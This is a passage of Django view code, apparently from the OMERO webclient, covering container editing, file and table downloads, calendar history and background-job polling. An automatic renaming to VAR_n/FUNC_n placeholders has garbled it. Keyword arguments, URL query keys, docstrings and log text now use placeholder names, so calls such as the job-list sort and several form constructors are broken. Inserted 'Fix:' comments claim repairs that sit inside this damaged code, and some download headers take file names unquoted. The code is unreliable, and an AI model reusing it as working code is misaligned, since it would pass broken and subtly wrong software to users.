                VAR_104.updateShareOrDiscussion(
                    VAR_401, VAR_382, VAR_64, VAR_443, VAR_442
                )
                VAR_71 = "enable" if VAR_443 else "disable"
                return HttpResponse(VAR_71)
            else:
                VAR_54 = "webclient/public/share_form.html"
                VAR_53 = {"share": VAR_104, "form": VAR_22}
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "editname":
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_38 = getattr(VAR_104, VAR_28)
            VAR_54 = "webclient/ajax_form/container_form_ajax.html"
            if VAR_28 == "tag":
                VAR_445 = VAR_38.textValue
            else:
                VAR_445 = VAR_38.getName()
            VAR_22 = ContainerNameForm(VAR_115={"name": VAR_445})
            VAR_53 = {"manager": VAR_104, "form": VAR_22}
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "savename":
        if not VAR_2.method == "POST":
            return HttpResponseRedirect(
                VAR_352("manage_action_containers", args=["edit", VAR_28, VAR_29])
            )
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_22 = ContainerNameForm(VAR_158=VAR_2.POST.copy())
            if VAR_22.is_valid():
                VAR_0.debug("Update VAR_3 VAR_22:" + VAR_347(VAR_22.cleaned_data))
                VAR_3 = VAR_22.cleaned_data["name"]
                VAR_363 = {"bad": "false", "o_type": VAR_28}
                VAR_104.updateName(VAR_28, VAR_3)
                return JsonResponse(VAR_363)
            else:
                VAR_364 = dict()
                for e in VAR_22.errors.items():
                    VAR_364.update({e[0]: unicode(e[1])})
                VAR_363 = {"bad": "true", "errs": VAR_364}
                return JsonResponse(VAR_363)
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "editdescription":
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_38 = getattr(VAR_104, VAR_28)
            VAR_54 = "webclient/ajax_form/container_form_ajax.html"
            VAR_22 = ContainerDescriptionForm(VAR_115={"description": VAR_38.description})
            VAR_53 = {"manager": VAR_104, "form": VAR_22}
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "savedescription":
        if not VAR_2.method == "POST":
            return HttpResponseServerError(
                "Action '%s' on the '%s' id:%s cannot be complited"
                % (VAR_27, VAR_28, VAR_29)
            )
        if hasattr(VAR_104, VAR_28) and VAR_29 > 0:
            VAR_22 = ContainerDescriptionForm(VAR_158=VAR_2.POST.copy())
            if VAR_22.is_valid():
                VAR_0.debug("Update VAR_3 VAR_22:" + VAR_347(VAR_22.cleaned_data))
                VAR_362 = VAR_22.cleaned_data["description"]
                VAR_104.updateDescription(VAR_28, VAR_362)
                VAR_363 = {"bad": "false"}
                return JsonResponse(VAR_363)
            else:
                VAR_364 = dict()
                for e in VAR_22.errors.items():
                    VAR_364.update({e[0]: unicode(e[1])})
                VAR_363 = {"bad": "true", "errs": VAR_364}
                return JsonResponse(VAR_363)
        else:
            return HttpResponseServerError("Object does not exist")
    elif VAR_27 == "remove":
        VAR_82 = VAR_2.POST["parent"]
        try:
            VAR_104.remove(VAR_82.split("|"))
        except Exception as x:
            VAR_0.error(traceback.format_exc())
            VAR_363 = {"bad": "true", "errs": VAR_347(x)}
            return JsonResponse(VAR_363)
        # Fix: success dict was assigned to 'rdict' while VAR_363 (unbound
        # on the success path) was returned.
        VAR_363 = {"bad": "false"}
        return JsonResponse(VAR_363)
    elif VAR_27 == "removefromshare":
        VAR_256 = VAR_2.POST.get("source")
        try:
            VAR_104.removeImage(VAR_256)
        except Exception as x:
            VAR_0.error(traceback.format_exc())
            VAR_363 = {"bad": "true", "errs": VAR_347(x)}
            return JsonResponse(VAR_363)
        # Same 'rdict'/VAR_363 fix as above.
        VAR_363 = {"bad": "false"}
        return JsonResponse(VAR_363)
    elif VAR_27 == "delete":
        VAR_455 = toBoolean(VAR_2.POST.get("child"))
        VAR_91 = toBoolean(VAR_2.POST.get("anns"))
        try:
            VAR_84 = VAR_104.deleteItem(VAR_455, VAR_91)
            VAR_2.session["callback"][VAR_347(VAR_84)] = {
                "job_type": "delete",
                "delmany": False,
                "did": VAR_29,
                "dtype": VAR_28,
                "status": "in progress",
                "error": 0,
                "dreport": _formatReport(VAR_84),
                "start_time": datetime.datetime.now(),
            }
            VAR_2.session.modified = True
        except Exception as x:
            VAR_0.error(
                "Failed to delete: %r" % {"did": VAR_29, "dtype": VAR_28}, exc_info=True
            )
            VAR_363 = {"bad": "true", "errs": VAR_347(x)}
        else:
            VAR_363 = {"bad": "false"}
        return JsonResponse(VAR_363)
    elif VAR_27 == "deletemany":
        VAR_457 = {
            "Image": VAR_2.POST.getlist("image"),
            "Dataset": VAR_2.POST.getlist("dataset"),
            "Project": VAR_2.POST.getlist("project"),
            "Annotation": VAR_2.POST.getlist("tag"),
            "Screen": VAR_2.POST.getlist("screen"),
            "Plate": VAR_2.POST.getlist("plate"),
            "Well": VAR_2.POST.getlist("well"),
            "PlateAcquisition": VAR_2.POST.getlist("acquisition"),
        }
        VAR_455 = toBoolean(VAR_2.POST.get("child"))
        VAR_91 = toBoolean(VAR_2.POST.get("anns"))
        VAR_0.debug(
            "Delete many: VAR_455? %s VAR_91? %s VAR_457 %s" % (VAR_455, VAR_91, VAR_457)
        )
        try:
            for VAR_312, VAR_187 in VAR_457.items():
                if VAR_187 is not None and len(VAR_187) > 0:
                    VAR_84 = VAR_104.deleteObjects(VAR_312, VAR_187, VAR_455, VAR_91)
                    if VAR_312 == "PlateAcquisition":
                        VAR_312 = "Plate Run"  # for nicer user VAR_382
                    VAR_459 = {
                        "job_type": "delete",
                        "start_time": datetime.datetime.now(),
                        "status": "in progress",
                        "error": 0,
                        "dreport": _formatReport(VAR_84),
                        "dtype": VAR_312,
                    }
                    if len(VAR_187) > 1:
                        VAR_459["delmany"] = len(VAR_187)
                        VAR_459["did"] = VAR_187
                    else:
                        VAR_459["delmany"] = False
                        VAR_459["did"] = VAR_187[0]
                    VAR_2.session["callback"][VAR_347(VAR_84)] = VAR_459
            VAR_2.session.modified = True
        except Exception:
            VAR_0.error(
                "Failed to delete: %r" % {"did": VAR_187, "dtype": VAR_312}, exc_info=True
            )
            raise
        else:
            VAR_363 = {"bad": "false"}
            return JsonResponse(VAR_363)
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_54(VAR_2, VAR_30, VAR_31=False, VAR_6=None, **VAR_7):
    """Stream an OriginalFile's contents; VAR_31 forces a download header.

    The connection is handed to the streaming response for cleanup.
    """
    VAR_6.SERVICE_OPTS.setOmeroGroup(-1)
    VAR_173 = VAR_6.getObject("OriginalFile", VAR_30)
    if VAR_173 is None:
        return handlerInternalError(
            VAR_2, "Original File does not exist (id:%s)." % (VAR_30)
        )
    VAR_174 = ConnCleaningHttpResponse(VAR_173.getFileInChunks(buf=settings.CHUNK_SIZE))
    VAR_174.conn = VAR_6
    VAR_175 = VAR_173.mimetype
    if VAR_175 == "text/x-python":
        VAR_175 = "text/plain"  # allows display in browser
    VAR_174["Content-Type"] = VAR_175
    VAR_174["Content-Length"] = VAR_173.getSize()
    if VAR_31:
        # Sanitise the filename for the Content-Disposition header.
        VAR_300 = VAR_173.name.replace(" ", "_")
        # Fix: 'downloadName' was an undefined name (NameError).
        VAR_300 = VAR_300.replace(",", ".")
        VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
    return VAR_174
@login_required(doConnectionCleanup=False)
@render_response()
def FUNC_55(VAR_2, VAR_32, VAR_33=None, VAR_6=None, **VAR_7):
    """Query an OMERO.table (OriginalFile id VAR_32).

    VAR_33 selects the output: "csv" streams the rows as a CSV download,
    "json" (or any non-None value) returns the marshalled data, and None
    renders the HTML table template with paging metadata.
    """
    VAR_176 = VAR_2.GET.get("query", "*")
    VAR_177 = FUNC_0(VAR_2, "offset", 0)
    VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
    VAR_178 = None
    try:
        VAR_178 = VAR_352("omero_iviewer_index")
    except NoReverseMatch:
        pass
    VAR_32 = VAR_241(VAR_32)
    VAR_173 = VAR_6.getObject("OriginalFile", VAR_32)
    if VAR_173 is None:
        raise Http404("OriginalFile %s not found" % VAR_32)
    # CSV rows are fetched lazily so the whole table is never in memory.
    VAR_179 = VAR_33 == "csv"
    # Fix: keyword values 'conn', 'query', 'offset', 'limit' and 'lazy'
    # were undefined names; pass this view's own locals.
    VAR_53 = webgateway_views._table_query(
        VAR_2, VAR_32, VAR_6=VAR_6, VAR_176=VAR_176, VAR_177=VAR_177, VAR_88=VAR_88, VAR_179=VAR_179
    )
    if VAR_53.get("error") or not VAR_53.get("data"):
        return JsonResponse(VAR_53)
    if VAR_33 == "csv":
        VAR_301 = VAR_53.get("data")
        VAR_302 = VAR_2.GET.get("header") == "false"

        def FUNC_88():
            # Generator yielding the CSV: optional header then row batches.
            if not VAR_302:
                VAR_405 = ",".join(VAR_301.get("columns"))
                yield VAR_405
            for rows in VAR_301.get("lazy_rows"):
                yield (
                    "\n" + "\n".join([",".join([VAR_347(VAR_364) for VAR_364 in VAR_378]) for VAR_378 in rows])
                )

        VAR_300 = VAR_173.name.replace(" ", "_").replace(",", ".")
        # Fix: 'downloadName' was an undefined name (NameError).
        VAR_300 = VAR_300 + ".csv"
        VAR_174 = TableClosingHttpResponse(FUNC_88(), content_type="text/csv")
        VAR_174.conn = VAR_6
        VAR_174.table = VAR_53.get("table")
        VAR_174["Content-Type"] = "application/force-download"
        VAR_174["Content-Disposition"] = "attachment; filename=%s" % VAR_300
        return VAR_174
    VAR_53["data"]["name"] = VAR_173.name
    VAR_53["data"]["path"] = VAR_173.path
    VAR_53["data"]["id"] = VAR_32
    VAR_53["meta"]["query"] = VAR_176
    # Only report a page number when the offset is page-aligned.
    if VAR_177 == 0 or VAR_177 / VAR_88 == VAR_177 // VAR_88:
        VAR_53["meta"]["page"] = (VAR_177 // VAR_88) + 1 if VAR_177 > 0 else 1
    VAR_5 = VAR_352("omero_table", args=[VAR_32])
    VAR_53["meta"]["url"] = VAR_5
    VAR_5 += "?VAR_88=%s" % VAR_88
    if VAR_176 != "*":
        VAR_5 += "&VAR_176=%s" % VAR_176
    if (VAR_177 + VAR_88) < VAR_53["meta"]["totalCount"]:
        VAR_53["meta"]["next"] = VAR_5 + "&VAR_177=%s" % (VAR_177 + VAR_88)
    if VAR_177 > 0:
        VAR_53["meta"]["prev"] = VAR_5 + "&VAR_177=%s" % (max(0, VAR_177 - VAR_88))
    if VAR_33 is None:
        # HTML view: pick out column indices/examples the template uses.
        VAR_53["template"] = "webclient/annotations/FUNC_55.html"
        VAR_53["iviewer_url"] = VAR_178
        VAR_303 = VAR_53["data"]["column_types"]
        if "ImageColumn" in VAR_303:
            VAR_53["image_column_index"] = VAR_303.index("ImageColumn")
        if "WellColumn" in VAR_303:
            VAR_53["well_column_index"] = VAR_303.index("WellColumn")
        if "RoiColumn" in VAR_303:
            VAR_53["roi_column_index"] = VAR_303.index("RoiColumn")
        VAR_304 = [VAR_390.lower() for VAR_390 in VAR_53["data"]["columns"]]
        if "shape" in VAR_304 and VAR_303[VAR_304.index("shape")] == "LongColumn":
            VAR_53["shape_column_index"] = VAR_304.index("shape")
        # Find an example numeric column (with >=2 values, no space in name).
        for idx, VAR_23 in enumerate(VAR_303):
            if VAR_23 in ("DoubleColumn", "LongColumn"):
                VAR_406 = VAR_53["data"]["columns"][idx]
                VAR_407 = []
                for VAR_378 in VAR_53["data"]["rows"]:
                    if VAR_378[idx]:
                        VAR_407.append(VAR_378[idx])
                    if len(VAR_407) > 3:
                        break
                if " " in VAR_406 or len(VAR_407) < 2:
                    continue
                VAR_53["example_column"] = VAR_406
                VAR_53["example_min_value"] = min(VAR_407)
                VAR_53["example_max_value"] = max(VAR_407)
                break
    return VAR_53
@login_required(doConnectionCleanup=False)
def FUNC_56(VAR_2, VAR_34, VAR_6=None, **VAR_7):
    """Stream a FileAnnotation's file as a forced download."""
    file_ann = VAR_6.getObject("FileAnnotation", VAR_34)
    if file_ann is None:
        return handlerInternalError(
            VAR_2, "FileAnnotation does not exist (id:%s)." % (VAR_34)
        )
    # Stream in chunks; the response object owns the connection cleanup.
    rsp = ConnCleaningHttpResponse(file_ann.getFileInChunks(buf=settings.CHUNK_SIZE))
    rsp.conn = VAR_6
    safe_name = file_ann.getFileName().replace(" ", "_")
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = file_ann.getFileSize()
    rsp["Content-Disposition"] = "attachment; filename=%s" % (safe_name)
    return rsp
@login_required()
def FUNC_57(VAR_2, VAR_26, VAR_6=None, **VAR_7):
    """Download an image's original (global + series) metadata as text."""
    image = VAR_6.getObject("Image", VAR_26)
    if image is None:
        raise Http404("No Image found with ID %s" % VAR_26)
    metadata = image.loadOriginalMetadata()
    # metadata[1] holds global key/value pairs, metadata[2] the series ones.
    lines = ["[Global Metadata]"]
    lines += ["%s=%s" % (kv[0], kv[1]) for kv in metadata[1]]
    lines.append("[Series Metadata]")
    lines += ["%s=%s" % (kv[0], kv[1]) for kv in metadata[2]]
    body = "\n".join(lines)
    rsp = HttpResponse(body)
    rsp["Content-Type"] = "application/force-download"
    rsp["Content-Length"] = len(body)
    rsp["Content-Disposition"] = "attachment; filename=Original_Metadata.txt"
    return rsp
@login_required()
@render_response()
def FUNC_58(VAR_2, VAR_6=None, **VAR_7):
    """Render the download/export placeholder page for the selected objects.

    Builds the real download URL from GET "ids" (e.g. "image-1|image-2")
    and, without a "format", lists the original files (deduplicated by
    fileset) with their total size so oversized zips can be refused.
    """
    VAR_184 = VAR_2.GET.get("format", None)
    if VAR_184 is not None:
        VAR_191 = VAR_352("download_as")
        VAR_305 = "Export_as_%s" % VAR_184
    else:
        VAR_191 = VAR_352("archived_files")
        VAR_305 = "OriginalFileDownload"
    VAR_185 = VAR_2.GET.get("ids")  # E.g. VAR_142-1|VAR_142-2
    VAR_186 = VAR_2.GET.get("name", VAR_305)  # VAR_4 zip VAR_3
    VAR_186 = os.path.basename(VAR_186)  # remove VAR_316
    if VAR_185 is None:
        raise Http404("No IDs specified. E.g. ?VAR_187=VAR_142-1|VAR_142-2")
    VAR_187 = VAR_185.split("|")
    VAR_188 = []
    VAR_189 = 0
    VAR_190 = 0
    if VAR_184 is None:
        # Original-file download: collect the imported files per image,
        # skipping images that share an already-seen fileset or file.
        VAR_306 = []
        VAR_214 = []
        for VAR_320 in VAR_187:
            if VAR_320.split("-")[0] == "image":
                VAR_306.append(VAR_320.split("-")[1])
            elif VAR_320.split("-")[0] == "well":
                VAR_214.append(VAR_320.split("-")[1])
        VAR_106 = []
        if VAR_306:
            VAR_106 = list(VAR_6.getObjects("Image", VAR_306))
        if len(VAR_106) == 0:
            raise Http404("No VAR_106 found.")
        VAR_307 = set()
        VAR_308 = set()
        for VAR_142 in VAR_106:
            VAR_365 = VAR_142.getFileset()
            if VAR_365 is not None:
                if VAR_365.id in VAR_307:
                    continue
                VAR_307.add(VAR_365.id)
            VAR_284 = list(VAR_142.getImportedImageFiles())
            VAR_366 = []
            for f in VAR_284:
                if f.id in VAR_308:
                    continue
                VAR_308.add(f.id)
                VAR_366.append({"id": f.id, "name": f.name, "size": f.getSize()})
                VAR_190 += f.getSize()
            if len(VAR_366) > 0:
                VAR_188.append(VAR_366)
        VAR_189 = sum([len(VAR_366) for VAR_366 in VAR_188])
    else:
        VAR_189 = len(VAR_187)
    VAR_176 = "&".join([_id.replace("-", "=") for _id in VAR_187])
    # Fix: 'download_url' was an undefined name (NameError); extend the
    # URL built above.
    VAR_191 = VAR_191 + "?" + VAR_176
    if VAR_184 is not None:
        VAR_191 = VAR_191 + "&VAR_184=%s" % VAR_184
    VAR_53 = {
        "template": "webclient/annotations/FUNC_58.html",
        "url": VAR_191,
        "defaultName": VAR_186,
        "fileLists": VAR_188,
        "fileCount": VAR_189,
        "filesTotalSize": VAR_190,
    }
    if VAR_190 > settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE:
        VAR_53["downloadTooLarge"] = settings.MAXIMUM_MULTIFILE_DOWNLOAD_ZIP_SIZE
    return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_59(VAR_2, VAR_35=None, VAR_36=None, VAR_6=None, **VAR_7):
    """Render the history calendar for a year/month (defaults to today)."""
    VAR_54 = "webclient/history/calendar.html"
    VAR_192 = VAR_2.session.get("user_id")
    if VAR_35 is not None and VAR_36 is not None:
        # Fix: pass this view's own arguments ('conn', 'year' and 'month'
        # were undefined names here, raising NameError).
        VAR_193 = BaseCalendar(VAR_6=VAR_6, VAR_35=VAR_35, VAR_36=VAR_36, eid=VAR_192)
    else:
        VAR_309 = datetime.datetime.today()
        VAR_193 = BaseCalendar(
            VAR_6=VAR_6, VAR_35=VAR_309.year, VAR_36=VAR_309.month, eid=VAR_192
        )
    VAR_193.create_calendar()
    VAR_53 = {"controller": VAR_193}
    VAR_53["template"] = VAR_54
    return VAR_53
@login_required(setGroupContext=True)
@render_response()
def FUNC_60(VAR_2, VAR_35, VAR_36, VAR_37, VAR_6=None, **VAR_7):
    """Render the paged history detail for one calendar day."""
    if VAR_35 is None or VAR_36 is None or VAR_37 is None:
        raise Http404("Year, VAR_36, and VAR_37 are required")
    VAR_54 = "webclient/history/history_details.html"
    VAR_87 = int(VAR_2.GET.get("page", 1))
    VAR_192 = VAR_2.session.get("user_id")
    # Fix: pass this view's own arguments ('conn', 'year', 'month', 'day'
    # were undefined names here, raising NameError).
    VAR_193 = BaseCalendar(
        VAR_6=VAR_6, VAR_35=VAR_35, VAR_36=VAR_36, VAR_37=VAR_37, eid=VAR_192
    )
    VAR_193.get_items(VAR_87)
    VAR_53 = {"controller": VAR_193}
    VAR_53["template"] = VAR_54
    return VAR_53
def FUNC_61(VAR_6, VAR_38):
    """Build a webclient "userdata" URL pointing at the given model object.

    A FileAnnotation is resolved to its first annotated project/dataset/
    image parent before the URL is built.
    """
    browse_url = VAR_352(viewname="load_template", args=["userdata"])
    if isinstance(VAR_38, omero.model.FileAnnotationI):
        ann = VAR_6.getObject("Annotation", VAR_38.id.val)
        for parent_type in ["project", "dataset", "image"]:
            parent_links = list(ann.getParentLinks(parent_type))
            if len(parent_links) > 0:
                VAR_38 = parent_links[0].parent
                break
    cls_name = VAR_38.__class__.__name__
    browsable = (
        "ImageI",
        "DatasetI",
        "ProjectI",
        "ScreenI",
        "PlateI",
        "WellI",
    )
    if cls_name in browsable:
        # Strip the model suffix "I", e.g. "ImageI" -> "image".
        browse_url += "?VAR_59=%s-%s" % (cls_name[:-1].lower(), VAR_38.id.val)
    return browse_url
def FUNC_62(VAR_2, VAR_39, **VAR_7):
    """Merge keyword fields into the session's callback entry for job VAR_39."""
    job_entry = VAR_2.session["callback"][VAR_39]
    for field_name, field_value in VAR_7.items():
        job_entry[field_name] = field_value
@login_required()
@render_response()
def FUNC_63(VAR_2, VAR_6=None, **VAR_7):
    """Poll all background jobs tracked in the session "callback" registry.

    GET with "jobId" returns that graph job's status; DELETE cancels one.
    Otherwise every registered chgrp/chown, send_email, delete and script
    job is polled and its session entry updated, then either a JSON summary
    (template == "json") or the activities panel context is returned.

    Fix applied: undefined name 'htmlId' -> VAR_368 (NameError when a
    callback key contained "/").
    """
    VAR_195 = 0  # jobs still in progress
    VAR_196 = 0  # jobs failed
    VAR_197 = []  # job keys with newly-arrived results
    _purgeCallback(VAR_2)
    # Single-job status query.
    VAR_198 = VAR_2.GET.get("jobId", None)
    if VAR_198 is not None:
        VAR_198 = VAR_347(VAR_198)
        try:
            VAR_367 = omero.cmd.HandlePrx.checkedCast(VAR_6.c.ic.stringToProxy(VAR_198))
            VAR_315 = VAR_367.getStatus()
            VAR_0.debug("job VAR_315: %s", VAR_315)
            VAR_174 = VAR_367.getResponse()
            if VAR_174 is not None:
                VAR_172 = graphResponseMarshal(VAR_6, VAR_174)
                VAR_172["finished"] = True
            else:
                VAR_172 = {"finished": False}
            VAR_172["status"] = {
                "currentStep": VAR_315.currentStep,
                "steps": VAR_315.steps,
                "startTime": VAR_315.startTime,
                "stopTime": VAR_315.stopTime,
            }
        except IceException:
            # Handle already gone: report the job as done.
            VAR_172 = {"finished": True}
        return VAR_172
    elif VAR_2.method == "DELETE":
        # Cancel a job by id (id in the request body).
        try:
            VAR_17 = json.loads(VAR_2.body)
        except TypeError:
            VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
        VAR_198 = VAR_17.get("jobId", None)
        if VAR_198 is not None:
            VAR_198 = VAR_347(VAR_198)
            VAR_172 = {"jobId": VAR_198}
            try:
                VAR_367 = omero.cmd.HandlePrx.checkedCast(VAR_6.c.ic.stringToProxy(VAR_198))
                VAR_315 = VAR_367.getStatus()
                VAR_0.debug("pre-cancel() job VAR_315: %s", VAR_315)
                VAR_172["status"] = {
                    "currentStep": VAR_315.currentStep,
                    "steps": VAR_315.steps,
                    "startTime": VAR_315.startTime,
                    "stopTime": VAR_315.stopTime,
                }
                VAR_367.cancel()
            except omero.LockTimeout:
                VAR_0.info("Timeout on VAR_367.cancel()")
            return VAR_172
    # Poll every registered job and update its session entry.
    for VAR_39 in VAR_2.session.get("callback").keys():
        VAR_313 = VAR_2.session["callback"][VAR_39]
        VAR_314 = VAR_313["job_type"]
        VAR_315 = VAR_313["status"]
        if VAR_315 == "failed":
            VAR_196 += 1
        VAR_2.session.modified = True
        if VAR_314 in ("chgrp", "chown"):
            if VAR_315 not in ("failed", "finished"):
                VAR_174 = None
                try:
                    VAR_367 = omero.cmd.HandlePrx.checkedCast(
                        VAR_6.c.ic.stringToProxy(VAR_39)
                    )
                    VAR_174 = VAR_367.getResponse()
                    VAR_431 = False
                    try:
                        if VAR_174 is not None:
                            VAR_431 = True
                            VAR_197.append(VAR_39)
                            if isinstance(VAR_174, omero.cmd.ERR):
                                VAR_447 = ", ".join(
                                    [
                                        "%s: %s" % (VAR_415, VAR_416)
                                        for VAR_415, VAR_416 in VAR_174.parameters.items()
                                    ]
                                )
                                VAR_0.error(
                                    "%s failed with: %s" % (VAR_314, VAR_447)
                                )
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    VAR_315="failed",
                                    report="%s %s" % (VAR_174.name, VAR_447),
                                    VAR_57=1,
                                )
                            elif isinstance(VAR_174, omero.cmd.OK):
                                FUNC_62(VAR_2, VAR_39, VAR_315="finished")
                        else:
                            VAR_195 += 1
                    finally:
                        VAR_367.close(VAR_431)
                except Exception:
                    VAR_0.info(
                        "Activities %s VAR_84 not found: %s" % (VAR_314, VAR_39)
                    )
                    continue
        elif VAR_314 == "send_email":
            if VAR_315 not in ("failed", "finished"):
                VAR_174 = None
                try:
                    VAR_367 = omero.cmd.HandlePrx.checkedCast(
                        VAR_6.c.ic.stringToProxy(VAR_39)
                    )
                    VAR_444 = omero.callbacks.CmdCallbackI(
                        VAR_6.c, VAR_367, foreground_poll=True
                    )
                    VAR_174 = VAR_444.getResponse()
                    VAR_431 = False
                    try:
                        if VAR_174 is not None:
                            VAR_431 = True
                            VAR_197.append(VAR_39)
                            if isinstance(VAR_174, omero.cmd.ERR):
                                VAR_447 = ", ".join(
                                    [
                                        "%s: %s" % (VAR_415, VAR_416)
                                        for VAR_415, VAR_416 in VAR_174.parameters.items()
                                    ]
                                )
                                VAR_0.error("send_email failed with: %s" % VAR_447)
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    VAR_315="failed",
                                    report={"error": VAR_447},
                                    VAR_57=1,
                                )
                            else:
                                VAR_450 = (
                                    VAR_174.success
                                    + len(VAR_174.invalidusers)
                                    + len(VAR_174.invalidemails)
                                )
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    VAR_315="finished",
                                    VAR_174={"success": VAR_174.success, "total": VAR_450},
                                )
                                if (
                                    len(VAR_174.invalidusers) > 0
                                    or len(VAR_174.invalidemails) > 0
                                ):
                                    VAR_453 = [
                                        e.getFullName()
                                        for e in list(
                                            VAR_6.getObjects(
                                                "Experimenter", VAR_174.invalidusers
                                            )
                                        )
                                    ]
                                    FUNC_62(
                                        VAR_2,
                                        VAR_39,
                                        report={
                                            "invalidusers": VAR_453,
                                            "invalidemails": VAR_174.invalidemails,
                                        },
                                    )
                        else:
                            VAR_195 += 1
                    finally:
                        VAR_444.close(VAR_431)
                except Exception:
                    VAR_0.error(traceback.format_exc())
                    VAR_0.info("Activities send_email VAR_84 not found: %s" % VAR_39)
        elif VAR_314 == "delete":
            if VAR_315 not in ("failed", "finished"):
                try:
                    VAR_84 = omero.cmd.HandlePrx.checkedCast(
                        VAR_6.c.ic.stringToProxy(VAR_39)
                    )
                    VAR_446 = omero.callbacks.CmdCallbackI(
                        VAR_6.c, VAR_84, foreground_poll=True
                    )
                    VAR_174 = VAR_446.getResponse()
                    VAR_431 = False
                    try:
                        if not VAR_174:  # Response not available
                            FUNC_62(
                                VAR_2,
                                VAR_39,
                                VAR_57=0,
                                VAR_315="in progress",
                                dreport=_formatReport(VAR_84),
                            )
                            VAR_195 += 1
                        else:  # Response available
                            VAR_431 = True
                            VAR_197.append(VAR_39)
                            VAR_174 = VAR_446.getResponse()
                            VAR_451 = isinstance(VAR_174, omero.cmd.ERR)
                            if VAR_451:
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    VAR_57=1,
                                    VAR_315="failed",
                                    dreport=_formatReport(VAR_84),
                                )
                                VAR_196 += 1
                            else:
                                FUNC_62(
                                    VAR_2,
                                    VAR_39,
                                    VAR_57=0,
                                    VAR_315="finished",
                                    dreport=_formatReport(VAR_84),
                                )
                    finally:
                        VAR_446.close(VAR_431)
                except Ice.ObjectNotExistException:
                    FUNC_62(
                        VAR_2, VAR_39, VAR_57=0, VAR_315="finished", dreport=None
                    )
                except Exception as x:
                    VAR_0.error(traceback.format_exc())
                    VAR_0.error("Status job '%s'error:" % VAR_39)
                    FUNC_62(
                        VAR_2, VAR_39, VAR_57=1, VAR_315="failed", dreport=VAR_347(x)
                    )
                    VAR_196 += 1
        elif VAR_314 == "script":
            if not VAR_39.startswith("ProcessCallback"):
                continue  # ignore
            if VAR_315 not in ("failed", "finished"):
                VAR_0.info("Check VAR_444 on script: %s" % VAR_39)
                try:
                    VAR_448 = omero.grid.ScriptProcessPrx.checkedCast(
                        VAR_6.c.ic.stringToProxy(VAR_39)
                    )
                except IceException:
                    FUNC_62(
                        VAR_2,
                        VAR_39,
                        VAR_315="failed",
                        Message="No process found for job",
                        VAR_57=1,
                    )
                    continue
                VAR_446 = omero.scripts.ProcessCallbackI(VAR_6.c, VAR_448)
                if VAR_446.block(0):  # ms.
                    VAR_446.close()
                    try:
                        VAR_452 = VAR_448.getResults(0, VAR_6.SERVICE_OPTS)
                        FUNC_62(VAR_2, VAR_39, VAR_315="finished")
                        VAR_197.append(VAR_39)
                    except Exception:
                        FUNC_62(
                            VAR_2,
                            VAR_39,
                            VAR_315="finished",
                            Message="Failed to FUNC_81 results",
                        )
                        VAR_0.info("Failed on VAR_448.getResults() for OMERO.script")
                        continue
                    # Marshal script outputs into plain session-safe values.
                    VAR_449 = {}
                    for VAR_312, VAR_375 in VAR_452.items():
                        VAR_416 = VAR_375.getValue()
                        if VAR_312 in ("stdout", "stderr", "Message"):
                            if VAR_312 in ("stderr", "stdout"):
                                VAR_416 = VAR_416.id.val
                            VAR_454 = {VAR_312: VAR_416}
                            FUNC_62(VAR_2, VAR_39, **VAR_454)
                        else:
                            if hasattr(VAR_416, "id"):
                                VAR_456 = {
                                    "id": VAR_416.id.val,
                                    "type": VAR_416.__class__.__name__[:-1],
                                }
                                VAR_456["browse_url"] = FUNC_61(VAR_6, VAR_416)
                                if VAR_416.isLoaded() and hasattr(VAR_416, "file"):
                                    VAR_458 = {
                                        "image/png": "png",
                                        "image/jpeg": "jpeg",
                                        "text/plain": "text",
                                    }
                                    if VAR_416.file.mimetype.val in VAR_458:
                                        VAR_456["fileType"] = VAR_458[
                                            VAR_416.file.mimetype.val
                                        ]
                                        VAR_456["fileId"] = VAR_416.file.id.val
                                    VAR_456["name"] = VAR_416.file.name.val
                                if VAR_416.isLoaded() and hasattr(VAR_416, "name"):
                                    VAR_3 = unwrap(VAR_416.name)
                                    if VAR_3 is not None:
                                        VAR_456["name"] = VAR_3
                                VAR_449[VAR_312] = VAR_456
                            else:
                                VAR_449[VAR_312] = unwrap(VAR_416)
                    FUNC_62(VAR_2, VAR_39, VAR_452=VAR_449)
                else:
                    VAR_195 += 1
    # Copy entries so templates can't mutate the session.
    VAR_172 = {}
    for VAR_39 in VAR_2.session.get("callback").keys():
        VAR_172[VAR_39] = copy.copy(VAR_2.session["callback"][VAR_39])
    if "template" in VAR_7 and VAR_7["template"] == "json":
        for VAR_39 in VAR_2.session.get("callback").keys():
            VAR_172[VAR_39]["start_time"] = VAR_347(
                VAR_2.session["callback"][VAR_39]["start_time"]
            )
        VAR_172["inprogress"] = VAR_195
        VAR_172["failure"] = VAR_196
        VAR_172["jobs"] = len(VAR_2.session["callback"])
        return JsonResponse(VAR_172)  # json
    VAR_199 = []
    VAR_200 = False
    for VAR_312, VAR_158 in VAR_172.items():
        # Derive an html-safe id from the job key.
        if len(VAR_312.split(" ")) > 0:
            VAR_368 = VAR_312.split(" ")[0]
            if len(VAR_368.split("/")) > 1:
                # Fix: 'htmlId' was an undefined name (NameError).
                VAR_368 = VAR_368.split("/")[1]
            VAR_172[VAR_312]["id"] = VAR_368
        VAR_172[VAR_312]["key"] = VAR_312
        if VAR_312 in VAR_197:
            VAR_172[VAR_312]["new"] = True
        if "error" in VAR_158 and VAR_158["error"] > 0:
            VAR_200 = True
        VAR_199.append(VAR_172[VAR_312])
    VAR_199.sort(VAR_312=lambda x: x["start_time"], VAR_352=True)
    VAR_53 = {
        "sizeOfJobs": len(VAR_2.session["callback"]),
        "jobs": VAR_199,
